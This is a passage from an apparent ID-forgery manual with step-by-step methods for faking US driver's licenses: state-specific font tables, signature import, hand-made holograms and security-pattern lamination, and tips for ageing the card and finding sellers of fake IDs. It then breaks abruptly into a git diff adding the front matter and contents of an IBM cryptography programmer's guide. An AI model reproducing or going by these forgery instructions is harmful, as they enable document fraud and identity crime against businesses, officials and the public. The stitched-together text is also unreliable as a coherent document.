choose Image, Effects, Scale. +3. Grab the corner square and pull down to adjust height. Drag the mouse very slowly. At first +you'll see no progress; then the height will suddenly skip 3 pixels or so. Once this happens, +slowly drag the mouse back 1 or 2 pixels to the size you want. +4. Hold cursor over the text and "hammer" it into place. +Enter Identifying Info +Once you have the data fields ready on the template, it's time to fill out the ID card. You should do +this in another layer using the proper fonts. But. . . Which Fonts Do You Use? This is the $64,000 +question of driver's license forgery. Decades ago, before the advent of holograms and bar codes, states +used obscure fonts to thwart forgeries. Even though the desktop publishing revolution has dramatical- +ly simplified document forgeries, obscure fonts are still a hurdle for forgers. In many cases, you will +not be able to match the font exactly and, even when you can, you will not exactly match its size. +Despite the seemingly infinite number of eventualities you have to concern yourself with, you need +not feel overwhelmed. In many cases, others have done the work for you through repeated experi- +mentation. For example, using 9-point Courier New Bold for the New Jersey driver's license is the clos- +est you'll ever get to matching the font exactly. Pretty painless, huh? +69 + +SECRETS OF A BACK-ALLEY ID MAN +This is a screen shot of a New Jersey template in progress. The template is being edited and enhanced using PhotoShop 3.0. +The New Jersey font scheme is pretty easy to remember: Courier New 9-point bold. +Asking around the Internet seems to be the best way to determine which fonts to use. Many times +you can get someone to e-mail you a font that he's used successfully. +Ruthless, marauding, mobster-type ID forgers often use whatever font they have on hand that +most closely matches. They know that clerks checking the ID will not notice if the font is off a lit- +tle. Clerks are busy looking at the information on the card and seldom suspect that a well-made ID +is a fake. +Some specific state driver's licenses are presented in the second half of this chapter. The informa- +tion under each state will seem sparse compared to the detail presented up to this point. But finding +the various fonts and font sizes for a specific state's driver's license is often the biggest part of the ID +battle. It's something that keeps modern document forgers very busy. Therefore, each state listed in +this chapter will have the proper fonts and sizes already calculated for easy academic experimentation. +Anyone who has ever undertaken the task of font matching will appreciate the value of having this work +done for them. +Dealing with Signatures +When applying for or renewing a license or ID, you are usually given a card to sign, which you +sign, more often than not, in black ink. The clerk then does something mysterious with the card and +takes your picture. After a little while, the clerk hands you a laminated ID card. It has your signature +on it, but it is smaller than when you signed the card. This is mildly interesting to most people; then +they stuff the ID in their wallet and never think again about how it was made. +The clerk photographed the information card with you standing next to it. Just like a vacation +70 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +snapshot, the image in the picture is smaller than the actual object photographed. This presents a +minor problem for ruthless reprobates who use the computer template method of forging driver's +licenses. The template method does not involve shooting down the ID. You are left to choose between +signing a printed template or importing your signature into PhotoShop. Each of these choices pre- +sents its own set of pros and cons. +Signing a printed template is difficult because(l) you have to write very small, and (2) the special- +ly coated high-resolution papers are not friendly to ballpoint pens. Using a felt-tip marker causes +smudge problems. The advantage to signing a printed template is that the signature—if you can get it +done—looks more natural, less electronic. +Importing your signature into PhotoShop allows you greater control over how it looks and elimi- +nates the possibility of ruining a printed template with a bad signature. The downside? The printed +signature looks somewhat computerized. This, however, may not be a drawback for IDs with digitized +signatures and is only a minor problem otherwise. To import a signature, use the procedure described +in Chapter 6 under "Steal City Seal." +Printout and Finishing Touches +Once you have a complete template design most of the battle is over. It's mechanics and common +sense from here on out. Some states will have the added hurdle of a particularly complex hologram, +but by this point you will have already decided how to handle it (see Chapter 4). +Put simply, you print out the templates, front and back; put them together with a hologram; and +laminate. Then there are a thousand subtleties one must keep in mind, depending on the style of +license, type of hologram, intended use, etc. Most of the subtleties and pitfalls have been covered in +this book and others, but here are a few checkpoints: +• Maintain the quality of the printout. Use correct photographic paper and printer settings. +• Choose the right type of paper and ink. Will you need a barrier layer to prevent bleeding? +• Keep edges clean and straight. It is best to glue front to back before cutting. +• Rounded corners must look professional! Keep at it till you get it right. +• If using a diffractive grating hologram, make sure it is protected from vinyl chloride in the +lamination pouch. +• Do not overheat diffractive grating holograms. +• Use the correct thickness lamination pouch; go light if adding protective layers. +SPECIFIC INFORMATION BY STATE +Now that you know the basic construction procedures for state driver's licenses, I will present some +specific information for a few select states. If you want to make an academic study of a state that I haven't +listed, it is a simple matter to do the necessary research on your own and then apply the foregoing tech- +niques. Even if you're not interested in any of the states below, you will pick up a pointer or two by study- +ing them. The various fonts and sizes may be of particular value: I invested a considerable amount of time +deciphering them. +New Jersey +The current New Jersey driver's license is the most faked ID of all time.3 Even a real New Jersey +driver's license is fast becoming useless as a means of "official" identification. It is the most widely +faked because it is one of the easiest to reproduce. For this reason, many newbie forgers cut their +teeth on it. Since New Jersey uses a metallic hologram, the following is also a good study for those who +wish to learn how lawless cretins fake them. +71 + +SECRETS OF A BACK-ALLEY ID MAN +Ma/re a stencil of the New Jersey logo out of Dura-Lar film. +Finished (modified and enhanced) New Jersey template +printed from an Alps MD-5000 onto VPhoto print film. Save +a copy as a high-quality JPEG. Import it into Word and then +copy and paste the image to fill a page. Print it for experi- +mentation. +You'll need Interference Gold acrylic paint and a foam appli- +cator to complete this procedure. Astute forgers dab the +Lay the Dura-Lar stencil over the printed New Jersey tem- applicator on tape to clean it before use. Any 2-inch cello- +plate in the appropriate position. phane tape should do the trick. +72 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +Press a miniscule amount of paint into the stencil. Jackhammer repeatedly until you feel you've covered the area completely. +You won't be able to see the results until you remove the stencil and hold the template at an angle to the light. If you can see +the results before this, you're probably putting on too much paint. +Front shot of finished product. Notice how you cannot see the hologram at this flat angle. +73 + +SECRETS OF A BACK-ALLEY ID MAN +Angle shot of finished product to show Interference Gold hologram. +upon my d..th I «n wil..n9 3 E*ES ° HEART 3 ANY ORGAN +3 LIVER 3KI0NEY8N0NE +• •• • • •' .»—i t«-™: • • • +A Metallic Gold hologram printed with an Alps MD-5000 Photo showing back of finished product. Actual crooks +printer. remember to place an X in the box next to the "NONE" +organ donation choice. +74 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +TABLE 2: FONT INFO FOR SOUTH DAKOTA +Section Font +Bitmap, 6-point, bold +FIELDS +Upper case +Dot matrix, 6-point, bold. +VITAL STATISTICS DATA +Doubled and offset 1 pixel to increase density +Upper case +Dot matrix, 8-point, bold +NAME AND ADDRESS Doubled and offset 1 pixel to increase density +Upper case +Bitmap, 12-point, bold +LICENSE NUMBER +Upper case +Bitmap, 5-point, bold +...DAYS PRIOR TO EXPIRATION... Spacing = 1 +Upper case +POWER OF ATTORNEY +Dot matrix, 5-point +LIVING WILL +"WILLIAM J. JANKLOW, GOVERNOR" Dot matrix, 25-pixel, bold +(May differ depending on year) Spacing = .5 +Specific Procedure: Obtain Template, Spruce It Up, Enter Info +Follow the basic procedure to obtain the template and modify it to an acceptable quality. Because +this license is so widely faked, the Internet is abundant with templates. New Jersey has the simplest +font scheme: use Courier New 9-point bold for your name, address, and all identifying information. +Well, there you have it: one of the most basic licenses there is. It makes a great study, but, again, +don't try to use it anywhere. This one's so basic that, even legitimate New Jersey driver's licenses are +rejected as proof of ID. +South Dakota +Nothing earth-shattering here: a simple rectangular hologram. The license term is up to five years +and seven months, allowing for six-month early renewal and one-month grace period after expiration. +Even if South Dakota changes this license format, the licenses will still be acceptable till at least 2004. +Malicious mental defectives will be using this license for quite some time. +Maine +Remember the Maine! Er, I Mean, Why Maine? +The current Maine driver's license is the age-old basic laminated card with repetitive lettering. I +commend the state for not going the way of Big Brother—at least not just yet. The problem is those +damn pirates coming in off the high seas. They exploit this poor little license to fulfill their prurient +pleasures with the fair maidens on dry land. And there's no end in sight. A Maine driver's license +issued in 2000 is good until 2006. That means even in 2005, a pirate with a Y2K Maine ID can run +around pillaging to his heart's content.4 Itjust doesn't seem fair, does it? +75 + +SECRETS OF A BACK-ALLEY ID MAN +Maine template. You do not have to worry too much about the corners or edges at this point. These will be trimmed in the +final step. +P/ace passport photo or other self-portrait in appropriate +corner, overlay the seal/signature/camera number trans- +Place template in typewriter and type away. Keep in mind parency, press it all together with a pane of glass, and take +that Maine has a seven-digit license number and a six-year exposures from varying distances to ensure that you get a +term expiring on the applicant's birthday. Issue date may be proper-sized print back from the developer. +before birthday. +76 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +The Maine license is one of only a handful remaining that can be produced entirely by old-school +methods. I will use it to demonstrate a few such techniques. +"Hand-Drawn" Template +The Maine template is very basic. It can be drawn by hand or possibly made with transfer lettering. +For our purposes, and because I am not a good drawer, the top photo on page 76 is actually a comput- +er-generated template. But you can see where artistically inclined incorrigibles could readily draw this +with pen and ink. Crooks with good Dumpster-diving skills could dig a blank information card from +behind a Maine DMV. You might choose to use the template at the top of page 76 to aid your academ- +ic study of this license. You can photocopy the seal, signature, and camera number onto a transparen- +cy to make an overlay. +I've thoroughly covered this procedure in two other books, so I'm not going to rehash the details.6 +But here are a few important reminders. The photo at the lower right-hand corner of page 76 was shot +with a 200mm macro lens. To get the end product the correct size, I had to shoot it fully zoomed out +from about 20 inches away. Different macros with different settings and focal ratios will produce differ- +ent results. The professional criminal must experiment on his own. +Security Pattern +The Maine driver's license has a repetitive security pattern on the lamination pouch. Fortunately +for criminals, but unfortunately for law-abiding citizens who just read about criminals, this security fea- +ture is a simple "STATE OF MAINE" pattern repeated in a straight column down the face of the lami- +nated card. It is a standard Interference Gold color and effect. Again, a gifted artist could spend a few +hours painting this in, but here are a few alternatives for the semi-gifted, the not so gifted, and the just +plain brain dead. +Rubber Stamp +For about $20 you can have a rubber stamp made up that says "STATE OF MAINE" in a repeated +column. Order it from another state and the person you speak with will probably have no idea why +you want it but will be happy to take your $20. Alternatively, you could buy a do-it-yourself stamp kit +for around $10. I have such a kit, and the font just so happens to be the right type, although a bit big- +ger. I doubt most bureaucrats would notice a larger font. +Gently brush Interference Gold acrylic paint onto either type of stamp using a foam applicator. +Use a miniscule, almost invisible amount. At this point you have several options: +• Stamp a piece of Dura-Lar film, which you'll later lay over the printed ID template before lami- +nating. +• Stamp an ID already laminated with a 5-mil pouch and then relaminate with another 5-mil +pouch. +• Stamp a heat-laminated ID and then "cold-laminate" it with Super Clear cellophane tape. +• Stamp a laminated ID and then heat-laminate just the front using half a 5-mil pouch. +Remember that the repetitive "STATE OF MAINE" pattern extends to the very edge of the ID (not +just to the edge of the visible template). Sometimes you must tear the fused edge of a lamination +pouch to achieve this effect. +Some disadvantages of the do-it-yourself kit are as follows: +• You have to assemble the letters "STATE OF MAINE" yourself. +• You have to stamp the lamination pouch several times. +77 + +SECRETS OF A BACK-ALLEY ID MAN +Do-it-yourself stamping kit. Arrange the letters to say A mock-up printing press to transfer the repetitive pattern +"STATE OF MAINE." Use narrow spacers to minimize the onto the lamination pouch or transparent insert. Rub only +length. The font is very dose to the actual font used. Most the slightest amount of Interference Gold onto the rubber +bureaucrats won't notice the difference. stamp. If you make a mistake on one line, it's easy to erase +it and redo. +• You have to keep reapplying the Interference Gold paint to the stamp. +• You have to be very careful to keep the repetitive pattern in line. +Once done, the letters are still slightly too big. +Another Repetitive Lettering Method +You can print the repetitive pattern onto Dura-Lar (or an even thinner transparent film) using a +Metallic Gold cartridge in an Alps printer. Here's the procedure: +1. Open Word or another word processor and make 20 or more "STATE OF MAINE" lines. +2. Select all text and change to Arial 10-point font. +3. Change line spacing to .7. In Word choose Paragraph, Line Spacing, Multiple, and enter .7 +into the box. +4. Select Print, Properties to get into the Alps control window. +5. Now, you have to cheat a little by telling the printer you are using laser printer paper. Then +select Spot Colors, Single Ink, Metallic Gold, and choose OK. +6. Load a transparency, Dura-Lar, or other transparent film into the Alps and print.6 +You now have a repetitive pattern in gold ink that is way too dark to be believable. +Get the cleanest, finest piece of steel wool you can find and begin to gently efface the repetitive +pattern. If you see immediate progress, you're pressing way too hard. Ease off and take your time. +78 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +Work evenly on all parts of the repetitive pat- +tern using a wide circular motion. After a while +you'll begin to see the effect you're looking for. +This is a crucial point because some areas will +be more effaced than others. Once a letter is +half erased, it does not take much to make it +disappear completely. So now you have to be +more selective with the steel wool. Gently rub +only the areas that still need rubbing. Do not +worry about the light scratches on the plastic +(transparency, Dura-Lar, whatever). Those will +be filled in by the vinyl chloride in the lamina- +tion pouch and will actually help keep air bub- +bles from forming. +You'll want to beat up the license a little +when you're done. A supposedly four-year-old +license is less believable if it is shiny and +scratch free. +Another One +If the above repetitive lettering method +sounds like more work than you want to get +into, there is a much faster method. You can +print directly to Dura-Lar or a transparency +using a gold ink cartridge in an Alps printer as +described above, with one minor adjustment. +First select all the text and choose Format, +Font. Next to Color, choose 25-percent gray. +Repetitive lettering printed onto Dura-Lar and laid over a +Now print. +composite Maine ID card. Add a back, cut, and laminate for +The downside to this method is that the +finished product. +gold ink does not offer a continuous tone. +Rather, it prints the repetitive pattern as a +sparse series of dots. Upon close inspection, the +dot pattern may look unnatural to a savvy clerk. +This aside, I'd bet an otherwise well-made +license using this repetitive lettering technique +would work nine times out of ten in states other +than Maine. +Choosing Outline under the Format Font +menu results in a slightly different look (outline +lettering), which also may work well in distant +foreign states. +And Another One +If you want to experiment with various +"shades" of gold, there is yet another variation +on this theme. You'll recall that Word gives you +The actual text on the Maine license back is blue. +little choice as to the "tone" of gold; you can +79 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +TABLE 4: FONT INFO FOR MASSACHUSETTS +Section Font +Arial, 24-pixel bold italic, color white. +Text placed inside solid black rectangles. +FIELDS +Rectangle height is 2 pixels more than text, such that +1 pixel borders the white text on top and bottom. +Upper case +Old English Text MT, 42-pixel, bold +COMMONWEALTH OF MASSACHUSETTS +Title case +Dot matrix, 6-point +"DRIVER'S LICENSE" DATA Spacing = 1 +Upper case +Arial, 20-pixel, italic +SIGNATURE BELOW +Upper case +Technocrat, 4 point +REGISTRAR Text direction vertical. +Once text is on screen, flip horizontal then vertical for +proper orientation +Very nice effect +Upper case +tion methods can be used, but sometimes scaling the text is faster, more efficient, and better looking. +See under "Character Size and Spacing" on page 69. +Using the Maine Template +You can print out the final template as a large card for a composite photo ID, or use PhotoShop to +fill in the data fields and print it out as a small card ready for backing and lamination. +Maine Back +Just as they'll tell you in the back woods of Maine, there's more than one way to skin a cat—and +they know firsthand, too. Well, I've already shown how a license back can be scanned into PhotoShop +and reworked, or used as-is if it's a good scan. But some of the cleanest license backs are laid out with +and printed directly from a good word processor. As previously mentioned, a word processor file takes +up far less memory than a high-resolution PhotoShop or JPEG image. The Maine back shown on page +79 was mocked up in Word 97. +Massachusetts +This is a previous edition Massachusetts license, which was still valid in late 1998. With a five-year +term, these suckers will be rearing their ugly heads well into the new millennium. The format shares +many of the characteristics of several state nondriver identification cards, some of which are valid +indefinitely. I chose this license for its intricate font variations, which by their sheer number once +acted as a security feature. This was a great forgery deterrent in its day, but the illustration on page 82 +shows how modern desktop publishing readily reproduces these fonts. +81 + +SECRETS OF A BACK-ALLEY ID MAN +PhotoShop template of previous edition Massachusetts driver's license. Note that it uses five different fonts. +CLASS CODES +Class A: Any combination of vehicles with a gross combination weight rating GCWR of 26,001 +pounds or more provided the GVWR of the vehicle(s) being towed is in excess of +10,000 pounds, except a School Bus. +Class B: Any single vehicle with a gross vehicle weight rating GVWR of 26,001 pounds or +more, or any such vehicle towing another vehicle not in excess of 10,000 pounds +GVWR, except a School Bus. +Class C: Any single vehicle that is less than 26,000 pounds GVWR, or any such vehicle towing a +vehicle not in excess of 10,000 pounds GVWR, that is placarded for hazardous materials +or designed to transport 16 or more persons, including the operator, except a School Bus. +Class D: Any motor vehicle or combination, except a Class A, Class B, Class C, Class M, or +School Bus. +Class M: Motorcycle. +RESTRICTIONS ENDORSEMENTS +B - Corrective lenses G- Limit to daylight only L- Vehicles without H- Hazardous Materials +C - Mechanical aid H - Limit to employment Air Brakes N- Tank vehicles +D-Prosthetic aid I- Jr. Operator M- Except Class A Bus P- Passenger Transport +E - Automatic Trans J-Other N - Except Class A&B Bus T-Doubles/Triples +F - Outside Mirror K-CDLintrastateonly O- Except Tractor Trailer X - Hazardous Material +& Tank vehicles +OBTAINCHANGEOF ADDRESS LABEL AT ANY REGISTRY AND ATTACH HEREWTTH NEW ADDRESS. +As with the back of the Maine driver's license, the back of the Massachusetts license was also laid out with Word 97. +82 + +How CROOKS CONSTRUCT KICK-ASS DRIVER'S LICENSES +(A.) E (B.) +This card is the official verification of your Social Security number. +Please sign it right away. Keep it in a safe place. +Improper use of this card or number by anyone is punishable by fine, Various ID backs: (A.) 1990 South Carolina +imprisonment or both. driver's license; (B.) 7 999 Illinois driver's +This card belongs to the Social Security Administration and you must license; (C.) a Social Security card, which +return it if we ask for it. +crooks often find handy; and (D.) a generic +If you find a card that isn't yours, please return it to: card back you can modify to your heart's +Social Security Administration +content. If you download a backless tem- +P.O. Box 17087, Baltimore, MD 21235 +plate from the Internet (an annoying reality, +For any other Social Security business/information, contact your +I'm afraid), try using one of these backs in +local Social Security office. If you write to the above address for any +business other than returning a found card, it will take longer for us its place. Modify them as you see fit. +to answer your letter. +Social Security Administration D12345678 +Form SSA-3000 (4-90) +(C.) +(D.) +83 + +SECRETS OF A BACK-ALLEY ID MAN +ID BACKS +If you've ever scoured the Internet for high-quality driver's license templates, you know how frustrating +it can be to find them. Many people end up paying for them and are still disappointed. It's even more frus- +trating when a good template does not include the back side! I find this exceedingly odd since one of the +first things any decent ID checker does is turn the card over; sometimes this is the only thing a clerk does +to verify an ID. I often wonder what people do when they get Internet templates without backs. I some- +times envision their finished product with a Mickey Mouse, Goofy, or Donald Duck sticker on the back. +Here are some license backs that can be used as generic backs for various state licenses when you +can't find the right one.7 +BUYING FAKE DRIVER'S LICENSES +Iniquitous inveiglers have recently learned that the Internet is one of the best places to buy such +fake ID as state driver's licenses. Unfortunately these Internet sites are short-lived. The proprietor of +www.youneedone.com recently met with a considerable amount of inner-party unpleasantness. For +about $50, the man, whom I shall call Crett Barreras, would make you a top-quality driver's license +from any state, perfectly replicating even the most intricate credit card—style driver's licenses with +complex repetitive rainbow holograms.8 The problem for diabolical dirtbags: Crett is now in the midst +of a crushing lawsuit and has had his site forced out of operation. +So what's an anarchist to do? Play "Beat the Feds, "that's what. Find the Web sites of other "Cretts" +before the government does. Use search engines, join newsgroups, ask questions. You'll find what +you're looking for before too long. +What about non-computer-sawy anarchists? Er, the old standbys I suppose will do. I won't list them +all, but you know . . . Blue Hill Ave., Sunset Strip, Alvarado Street, Bonanza Road. You know which +cities. If you don't, drive some night to the biggest city in your state and walk around till you hear +someone scream, "Oh, my god, I'm being stabbed to death!" Walk toward the screaming—the gun- +shots should get louder; the body count should increase. Walk right to the center of the mayhem: +that's where you begin your search. +I hope you understand why I can't list exact addresses. I want to keep the Crett Barrerases of the +world out of prison if I can at all help it. Okay, now wait, I seem to hear a collective shout of Why ? +Aren't the Crett Barrerases the very cretins this book is supposed to expose"? Well, that's really beside the point. I +just happen to believe that prisons are best suited for violent offenders. +NOTES +1. Smart criminals never use an improvised ID back in the state that supposedly issued it. +2. This is width and height of the ID card, not the lamination pouch. +3. At the time of this writing. +4. It is possible that Maine could do a "recall" of all licenses and force citizens to upgrade to a more secure document. +I tend to doubt this would ever happen, though. It would cost millions of dollars to implement, and the freedom- +minded folks of rural Maine would oust every incumbent politician in the next election. +5. Charrett, The Modern Identity Changer: How To Create and Use a New Identity for Privacy and Personal Freedom,, and +Identity, Privacy, and Personal Freedom: Big Brother vs. The New Resistance, both available from Paladin. +6. Incidentally, you could print this onto paper with black ink as photo-ready artwork for a rubber stamp. +7. In this case you'd only use the ID in a state well distanced from the state that supposedly issued it. +8. It is important to note that Crett made his licenses using the techniques and equipment discussed in this book. +Granted, his techniques were well refined and his business allowed him to spend thousands of dollars on the very +best equipment, but the fundamental construction principles are the same. +84 + +Conclusion +I have done my best to illustrate the various methods good-for-nothing bastards use to create false +identification. I have demonstrated some of the most modern techniques—a few of which have hither- +to escaped publication, and one of which was my very own creation. I have also expanded upon meth- +ods previously published by others and myself. And, for what it's worth, I've been told that I have given +the world more synonyms for the word "crook" than it could ever need, want, or use. +Uh oh, there's that collective shouting again . . . Hey, Sheldon, you never answered our question. Isn't +this book about how naughty, nasty incorrigible anarchists spatter their wickedness onto our otherwise decent and +pure society"? Isn't it about staying as far as possible away from this evil? About renouncing Satan and the Hell's +Angels he has deployed on our good earth to tempt us? Isn't this book about exposing the Crett Barrerases of the +world so that we may be saved? You just brushed off that question at the end of Chapter 7. What's gives? +Okay, okay. You got me. As far as the foregoing being what this book is really all about, to all my +beloved readers, some of whom are federal agents in charge of a rather bulky dossier with my name +on it, I have only this to say. +Peace. +85 + +Appendix A +Contacting the +Author +The only way to reach me is through the Internet at sxcharrett@yahoo.com. I know, in the past +I've said I could be reached by writing to me in care of Paladin Press, but life has gotten too complex +for this. The Internet is just too darned efficient, and I find I must take advantage of it before Big +Brother ruins it with regulation. +If you have any questions, please first check my Delphi discussion board. If you do not find +your answer there, please post a message in the appropriate category or create a category of your +own, so that others my benefit from the ensuing discussion. The discussion board currently has a +small user base, but I'm hopeful that it will grow after this book's publication. This is important +because I've been getting more and more skittish about answering questions. The feds have tried +on more than one occasion to trap me into an aiding and abetting rap with trick questions from +my "readers." Although I will continue to answer hypothetical questions on my discussion board, +eventually I hope that my readers will be able to share information among themselves. Hell, I +might even learn a new trick or two, which might prove useful when I, too, am pressured by Big +Brother into pulling the big Houdini. +You can find additional information as well as updates and corrections to all my books on my Web site: +http://www.phreak.co.uk/sxc +This site is graciously donated by the wonderful beings of the Phreakiverse. There are no annoy- +ing banners or pop-up ads. It is a truly philanthropic venture to support weirdos like me. When you +87 + +SECRETS OF A BACK-ALLEY ID MAN +visit my Web site, please also visit the rest of the Phreakiverse. You won't be disappointed. Please +remember to thank the Webmasters for providing this much-needed service. +Since my current Web space is donated, it could disappear without warning if the Phreakiverse +loses its funding. So, if you cannot find me there, please go the author links section of Paladin's Web +site to find my new cyber locale: +http://www.paladin-press.com/authorlinks +88 diff --git a/SecureKey Programming_pdf.md b/SecureKey Programming_pdf.md new file mode 100644 index 0000000..fea730c --- /dev/null +++ b/SecureKey Programming_pdf.md @@ -0,0 +1,25607 @@ +# SecureKey Programming + + +--- + +(cid:2)(cid:3)(cid:4) +Linux for System z +Secure Key Solution with the Common +Cryptographic Architecture Application +Programmer's Guide +SC33-8294-02 + +(cid:2)(cid:3)(cid:4) +Linux for System z +Secure Key Solution with the Common +Cryptographic Architecture Application +Programmer's Guide +SC33-8294-02 + +Note! +Beforeusingthisinformationandtheproductitsupports,besuretoreadthegeneralinformationinthe“Notices”onpage +561. +ThirdEdition(March2011) +ThiseditionappliestotheCommonCryptographicArchitecture(CCA)API,Release4.1.0,forLinuxonIBMSystem +z,andtoallsubsequentreleasesandmodificationsuntilotherwiseindicatedinneweditions. +ThiseditionreplacesSC33-8294-01. +Thisbookisforplanningandprogrammingpurposesonly. +IBMwelcomesyourcomments.Aformforreaders'commentsmaybeprovidedatthebackofthisdocument,oryou +mayaddressyourcommentstothefollowingaddress: +IBMDeutschlandResearch&DevelopmentGmbH +InformationDevelopment +Department3248 +SchoenaicherStrasse220 +71032Boeblingen +Germany +Internete-mail:eservdoc@de.ibm.com +Ifyouwouldlikeareply,besuretoincludeyourname,address,telephonenumber,orFAXnumber. +Makesuretoincludethefollowinginyourcommentornote: +v Titleandordernumberofthisdocument +v Pagenumberortopicrelatedtoyourcomment +WhenyousendinformationtoIBM,yougrantIBManonexclusiverighttouseordistributetheinformationinany +wayitbelievesappropriatewithoutincurringanyobligationtoyou. +©CopyrightIBMCorporation2007,2011. +USGovernmentUsersRestrictedRights–Use,duplicationordisclosurerestrictedbyGSAADPScheduleContract +withIBMCorp. + +Contents +Figures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ix +Tables. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xi +About this document . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xv +Revision history . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xv +|| Third edition, March 2011, CCASupport Program Release 4.1.0 . . . . . . . . . . . . . . xv +Second edition,April 2010, CCASupport Program Release 4.0.0. . . . . . . . . . . . . . xvi +Who should use this document . . . . . . . . . . . . . . . . . . . . . . . . . . . xvi +Distribution-specific information . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii +Terminology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii +Hardware requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xvii +How to use this document. . . . . . . . . . . . . . . . . . . . . . . . . . . . . xviii +Where to find more information . . . . . . . . . . . . . . . . . . . . . . . . . . . xix +Related publications . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xx +Do you have problems, comments, or suggestions?. . . . . . . . . . . . . . . . . . . . xx +Part 1. IBM CCA programming. . . . . . . . . . . . . . . . . . . . . . . . . 1 +Chapter1. Introduction to programming for the IBM Common CryptographicArchitecture. . . . 3 +Available Common CryptographicArchitecture verbs . . . . . . . . . . . . . . . . . . . . 3 +Common CryptographicArchitecture functional overview . . . . . . . . . . . . . . . . . . 4 +How application programs obtain service . . . . . . . . . . . . . . . . . . . . . . . 7 +Overlapped processing. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 +CPACF support. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 +Environment variables that affect CPACF usage. . . . . . . . . . . . . . . . . . . . . 8 +Access control points that affect CPACF protected key operations . . . . . . . . . . . . . . 9 +CPACF operation (protected key) . . . . . . . . . . . . . . . . . . . . . . . . . . 9 +CCAlibrary CPACF preparation at startup . . . . . . . . . . . . . . . . . . . . . . 11 +Interaction between the 'default card' and use of Protected Key CPACF . . . . . . . . . . . 11 +SecurityAPI programming fundamentals . . . . . . . . . . . . . . . . . . . . . . . . 12 +Verbs, variables, and parameters. . . . . . . . . . . . . . . . . . . . . . . . . . 12 +Commonly encountered parameters. . . . . . . . . . . . . . . . . . . . . . . . . 14 +How to compile and link CCAapplication programs . . . . . . . . . . . . . . . . . . . . 16 +Building Java applications to use with the CCAJNI . . . . . . . . . . . . . . . . . . . 16 +|| Chapter2. UsingAES, DES, and HMAC cryptography and verbs . . . . . . . . . . . . . 19 +|| Functions of theAES, DES and HMAC cryptographic keys . . . . . . . . . . . . . . . . . 19 +Key separation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 +Master key variant . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 +Transport key variant . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 +Key forms . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20 +Key token . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21 +|| Key wrapping . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 +Control vector. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 +Types of keys. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25 +Multi-coprocessor capabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31 +Using the CCAnode and master key management verbs. . . . . . . . . . . . . . . . . . 32 +Verbs for managingAES and DES key storage files. . . . . . . . . . . . . . . . . . . . 33 +Verbs for managing the PKAkey storage file and PKAkeys in the cryptographic engine . . . . . . 33 +|| Improved remote key distribution. . . . . . . . . . . . . . . . . . . . . . . . . . . 34 +|| Remote key loading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34 +Verbs that support Secure Sockets Layer (SSL) . . . . . . . . . . . . . . . . . . . . . 36 +©CopyrightIBMCorp.2007,2011 iii + +Enciphering and deciphering data . . . . . . . . . . . . . . . . . . . . . . . . . . 36 +Managing data integrity and message authentication . . . . . . . . . . . . . . . . . . . 36 +Message authentication code processing. . . . . . . . . . . . . . . . . . . . . . . 36 +Hashing functions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 37 +Processing personal identification numbers . . . . . . . . . . . . . . . . . . . . . . . 37 +Verifying credit card data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38 +Secure messaging . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38 +Trusted Key Entry support . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38 +Typical sequences of CCAverbs. . . . . . . . . . . . . . . . . . . . . . . . . . . 39 +|| Summary of the CCAnodes and resource control verbs . . . . . . . . . . . . . . . . . . 40 +Summary of theAES, DES, and HMAC verbs . . . . . . . . . . . . . . . . . . . . . . 40 +Chapter3. Introducing PKAcryptography and using PKAverbs. . . . . . . . . . . . . . 47 +|| PKAkey algorithms. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47 +PKAmaster keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47 +Operational private keys . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47 +PKAverbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 +Verbs supporting digital signatures . . . . . . . . . . . . . . . . . . . . . . . . . . 48 +Verbs for PKAkey management . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 +PKAkey tokens . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 48 +PKAkey management. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49 +Key identifier for PKAkey token . . . . . . . . . . . . . . . . . . . . . . . . . . . 50 +Key label . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51 +Key token . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51 +Summary of the PKAverbs. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 +Part 2. CCA verbs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 55 +|| Chapter4. Using the CCAnodes and resource control verbs. . . . . . . . . . . . . . . 57 +Cryptographic Facility Query (CSUACFQ) . . . . . . . . . . . . . . . . . . . . . . . 58 +Determining if a card is a CEX2C or CEX3C . . . . . . . . . . . . . . . . . . . . . 58 +Cryptographic Facility Version 